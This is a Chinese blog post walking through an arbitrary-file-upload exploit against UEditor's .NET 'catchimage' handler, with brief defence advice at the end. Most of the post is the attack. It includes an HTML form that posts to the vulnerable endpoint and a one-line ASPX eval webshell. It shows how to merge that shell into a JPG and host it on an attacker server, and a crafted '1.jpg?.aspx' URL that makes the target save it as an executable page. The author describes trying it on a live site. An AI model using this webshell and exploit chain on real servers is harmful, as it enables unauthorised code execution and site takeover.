UEditor .Net版本任意文件上传漏洞复现

目录

  漏洞背景
  漏洞影响
  漏洞利用
  漏洞分析
  防御措施

漏洞背景

UEditor是由百度WEB前端研发部开发的所见即所得的开源富文本编辑器

漏洞影响

该漏洞影响UEditor的.Net版本,其它语言版本暂时未受影响。

漏洞利用

首先准备一个html文件用来做post提交

<form action="http://www.xxx.com/ueditor/net/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded" method="POST">
<p>shell addr:<input type="text" name="source[]" /></p >
<input type="submit" value="Submit"/>
</form>

action处填写网站controller.ashx的路径
另外:enctype="application/x-www-form-urlencoded"什么意思?

打开html后如下
在这里插入图片描述

这个时候我们需要一台服务器用来放图片木马,服务器可以去阿里云、华为云等申请免费的

我们准备一张2.jpg的图片跟一个小马3.aspx,小马代码如下

<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

cmd命令合成图片木马

copy 2.jpg/b + 3.aspx/a 1.jpg

我们把此木马上传到我们的服务器,记住服务器图片路径

在之前的shell addr里填写如下参数

在这里插入图片描述

http://x.x.x.x/1.jpg?.aspx

http://x.x.x.x/1.jpg是我们服务器的地址后面跟.aspx以生成aspx文件,提交后页面如下

在这里插入图片描述
按理来说我们上传的文件路径应该如下

http://www.xxx.com/ueditor/net/upload/2206/2206-63790xxxxxxx0006134716.aspx

但链接了下不行,后来知道是服务器源码被改了
在这里插入图片描述
这里路径是碰巧猜到的,正常应该是带前缀的
在这里插入图片描述
这里给去了,所以木马路径应该是

http://www.xxx.com/upload/2206/2206-63790xxxxxxx0006134716.aspx

我发现服务器已经被人入侵了,且留下了后门,我猜测是之前入侵的人改的源码

漏洞分析
UEditor在抓取远程数据源的时,会进入"catchimage"分支
在这里插入图片描述
漏洞的成因是在获取图片资源时仅检查了ContentType,导致可以绕过达到任意文件上传。
在这里插入图片描述

java不会啊,没法分析源码,等我学习完后再补充吧

防御措施

1.修改工程目录下net/App_Code/CrawlerHandler.cs文件,添加对文件类型检查的代码。 2.使用各类WAF软件,防止攻击者上传恶意文件。 3.检查文件上传路径下是否有近期上传的畸形图片;检查是否存在asp,aspx等类型危险文件。如果发现异常文件,请判断后及时删除。
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值